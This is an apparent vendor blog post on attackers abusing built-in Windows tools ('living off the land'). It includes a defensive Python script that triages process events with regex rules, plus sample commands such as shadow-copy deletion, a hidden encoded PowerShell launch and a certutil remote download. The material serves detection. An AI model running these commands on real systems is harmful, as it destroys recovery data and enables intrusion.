
Cybersecurity Trends: What to Expect from Adversaries Beyond the Generative AI Buzz – Part Two


In this four-part series, Systal’s SOC Analyst Abbey Adegbola delves into the adversary trends affecting the ever-evolving cybersecurity landscape. Part Two focuses on ‘Defending Against the Use of Native Tools by Adversaries’.

The cybersecurity landscape is abuzz with discussions about the potential misuse of generative AI by threat actors for everything from sophisticated phishing to malware generation. Most organisations are focused on the continued evolution of generative AI, but other critical adversarial trends continue to shape the threat landscape. Security teams, businesses and individuals alike must stay ahead of the latest threats in order to safeguard their data and infrastructure.

While the threats posed by generative AI are genuine, it is crucial not to overlook some prevalent and insidious adversarial trends. Part One of this cyber trends series looked at the ‘Continued Exploitation of Misconfigurations and Unpatched Systems’. Part Two continues with another prevalent trend: Living off the Land.

Why LOL is No Laughing Matter – Defending Against the Use of Native Tools by Adversaries

‘Living off the Land’ (LOL) is a technique now widely used by threat actors and other adversary groups to evade detection and reduce their footprint in the environments they target. It involves using native system utilities and programmes that are either installed by default in most environments or that attackers identify during the reconnaissance phase of their activities. These are then leveraged to move laterally, stage and exfiltrate data, or maintain persistence in the victim’s environment.

Native tools are legitimate system utilities and binaries that are pre-installed by default on systems. Examples of Living Off the Land Binaries (LOLBins) include PowerShell, WMIC, PsExec and Certutil; Remote Monitoring and Management (RMM) tools such as RDP and WinRM; and many others. For adversaries, these tools offer several advantages: they are stealthy, they evade detection by security tools, and they provide extensive capabilities. Their use is far less likely to raise immediate suspicion than dropping custom malware. By using these legitimate tools to infiltrate and navigate networks covertly, adversaries increase their chances of accomplishing their objectives without being noticed. Many ransomware groups, such as Akira, LockBit and Phobos, are known to use PowerShell, vssadmin.exe, the Windows Management Instrumentation command-line utility (WMIC) and others to discover and delete volume shadow copies in Windows environments, frustrating and preventing victims from recovering files after encryption has taken place.

According to the IBM X-Force Threat Intelligence Index 2024, up to one-third (32%) of the incidents that the X-Force team responded to in 2023 were cases in which adversaries used legitimate tools for malicious activities such as reconnaissance, credential theft, privilege escalation, data exfiltration and remote access. PowerShell, for example, is an incredibly powerful scripting tool that is often misused and weaponised by adversaries to download remote payloads, execute malicious code in memory and move laterally across systems. In recent months, Systal’s own DFIR team have identified the adversarial use of utilities such as Windows Remote Desktop, vssadmin.exe, WinSCP and WinRAR, to name but a few.

The Challenge for Defence

Detecting malicious use of native system tools is inherently difficult because these tools serve legitimate administrative purposes, so distinguishing malicious intent from regular use is usually tricky. Context is vital: a command that is benign on a developer’s or administrator’s workstation would be suspicious on an HR system. These are powerful tools with legitimate uses, and the key is in spotting the deviation from normal activity.
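The point made above (and in the shadow-copy discussion earlier) is that the same command line can be routine on one host and an incident on another, so detection has to weigh context, not just the binary name. The following is an added example, not Systal’s code or a SIEM rule from the article: a small Python triage routine that runs a few LOLBin patterns over constructed process-creation records (shaped like a Sysmon Event ID 1 or Security 4688 extraction) and raises or lowers the severity according to the host’s role and the parent process. The field names, host-role labels, scoring weights and the sample events are all assumptions made for illustration.

```python
"""Context-aware triage of process-creation events for LOLBin abuse.

Added example, not Systal's code. Event records are constructed in the
shape of a Sysmon Event ID 1 / Security 4688 extraction; the field names,
host roles and scoring weights are assumptions for illustration.
"""
import re
from dataclasses import dataclass

# Each rule: name, pattern applied to "image command_line", base severity.
# The patterns cover behaviours the article names: shadow copy deletion via
# vssadmin/WMIC/PowerShell, PowerShell fetching or executing remote content,
# and certutil used as a downloader/decoder.
RULES = [
    ("shadow_copy_deletion",
     re.compile(r"vssadmin(\.exe)?\s+delete\s+shadows"
                r"|wmic(\.exe)?\s+shadowcopy\s+delete"
                r"|win32_shadowcopy.*remove-wmiobject", re.I),
     "high"),
    ("powershell_remote_payload",
     re.compile(r"powershell.*(downloadstring|downloadfile|invoke-webrequest"
                r"|invoke-expression|\biex\b|-enc(odedcommand)?\b)", re.I),
     "medium"),
    ("certutil_download",
     re.compile(r"certutil(\.exe)?\s+.*(-urlcache|-decode)", re.I),
     "medium"),
]

# Office applications rarely have a legitimate reason to spawn a shell.
SUSPICIOUS_PARENTS = {"winword.exe", "excel.exe", "outlook.exe", "powerpnt.exe"}

# Host roles on which the matched commands are plausibly routine (assumed tags).
ADMIN_ROLES = {"admin_workstation", "developer_workstation", "backup_server"}

SEVERITY = ["low", "medium", "high", "critical"]


def adjust(severity: str, delta: int) -> str:
    """Move a severity up or down the scale, clamped to the ends."""
    idx = SEVERITY.index(severity) + delta
    return SEVERITY[max(0, min(idx, len(SEVERITY) - 1))]


@dataclass
class Alert:
    host: str
    user: str
    rule: str
    severity: str
    reasons: list


def triage_event(event: dict) -> list:
    """Return one Alert per matching rule, with severity adjusted by context."""
    text = f"{event['image']} {event['command_line']}"
    alerts = []
    for name, pattern, base in RULES:
        if not pattern.search(text):
            continue
        severity, reasons = base, []
        if event["host_role"] not in ADMIN_ROLES:
            severity = adjust(severity, +1)
            reasons.append(f"unexpected on {event['host_role']}")
        if event["parent_image"].lower() in SUSPICIOUS_PARENTS:
            severity = adjust(severity, +1)
            reasons.append(f"spawned by {event['parent_image']}")
        if not reasons:
            # Admin host, ordinary parent: still recorded, but as likely routine.
            severity = adjust(severity, -1)
            reasons.append("consistent with administrative use")
        alerts.append(Alert(event["host"], event["user"], name, severity, reasons))
    return alerts


def triage(events: list) -> list:
    """Triage a batch of events, preserving their order."""
    alerts = []
    for event in events:
        alerts.extend(triage_event(event))
    return alerts


# Constructed sample events (not real telemetry).
SAMPLE_EVENTS = [
    {"host": "HR-WS-07", "host_role": "hr_workstation", "user": "j.doe",
     "parent_image": "WINWORD.EXE", "image": "powershell.exe",
     "command_line": "powershell.exe -w hidden -enc <base64 omitted>"},
    {"host": "BKP-01", "host_role": "backup_server", "user": "svc_backup",
     "parent_image": "backupagent.exe", "image": "vssadmin.exe",
     "command_line": "vssadmin.exe delete shadows /for=D: /oldest"},
    {"host": "HR-WS-07", "host_role": "hr_workstation", "user": "j.doe",
     "parent_image": "cmd.exe", "image": "vssadmin.exe",
     "command_line": "vssadmin.exe delete shadows /all /quiet"},
    {"host": "DEV-WS-12", "host_role": "developer_workstation", "user": "a.smith",
     "parent_image": "explorer.exe", "image": "powershell.exe",
     "command_line": "powershell.exe Get-Process | Sort-Object CPU"},
    {"host": "FS-02", "host_role": "file_server", "user": "svc_print",
     "parent_image": "cmd.exe", "image": "certutil.exe",
     "command_line": "certutil.exe -urlcache -split -f http://example.invalid/a.txt a.txt"},
]

if __name__ == "__main__":
    for alert in triage(SAMPLE_EVENTS):
        print(f"[{alert.severity:8}] {alert.host} {alert.user} {alert.rule}: "
              + "; ".join(alert.reasons))
```

Run as a script, the routine flags the Word-spawned PowerShell on the HR workstation and the shadow copy deletion on the same host as critical, the certutil download on the file server as high, and the backup server’s scheduled `vssadmin` run as a medium, likely-routine alert, while the developer’s ordinary `Get-Process` produces nothing. In practice the role and parent-process tables would come from an asset inventory and a baseline of observed parent/child pairs rather than hard-coded sets.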

It is worth noting that these tools and utilities are double-edged swords. While they enhance system administration and remote management, they can also be abused by adversaries. To protect against their abuse, organisations must adopt robust security practices, monitor tool usage, deploy endpoint detection and response (EDR) solutions, remove unnecessary privileges to mitigate risk, and implement the principle of least privilege, making it harder for adversaries to abuse legitimate tools even if they gain a foothold.

Systal’s Capabilities to Protect Organisations

It is essential for organisations of any size to have a robust and effective cybersecurity programme in place that encompasses the fundamental security practices. However, many organisations find it difficult to create and maintain a robust cybersecurity programme and a healthy cybersecurity culture that can keep pace with the threat landscape. Systal offers a broad range of cybersecurity services, from security operations, digital forensics and incident response to professional services that fully manage a customer’s security and protect their digital assets and environment. Our strong capabilities in continuous monitoring and managed detection and response can help organisations protect themselves against ever-evolving and sophisticated cyber threats.

Systal Operational Services offer a comprehensive framework to protect your organisation’s digital health and resilience using cutting-edge technology. With a dedicated global SOC and a proven Cyber Security Incident Response Team (CSIRT), our services are designed to proactively monitor, manage, detect, respond to and remediate potential cyber threats. For more information on how Systal can help solve your cybersecurity challenges, contact our experts.

Next in the series, we will examine prevalent identity-based attacks and how these will continue to take centre stage.

Abbey Adegbola is an experienced Security Engineer working with Systal Technology Solutions. Abbey brings over seven years of IT support and SOC analyst experience to the Security team within Systal, providing security engineering support and L3 SOC analysis services to Systal’s customers and internal Security Team. Abbey is also a skilled malware analyst and reverse engineer who works to support the capabilities of Systal’s Cyber Security and Incident Response Teams.
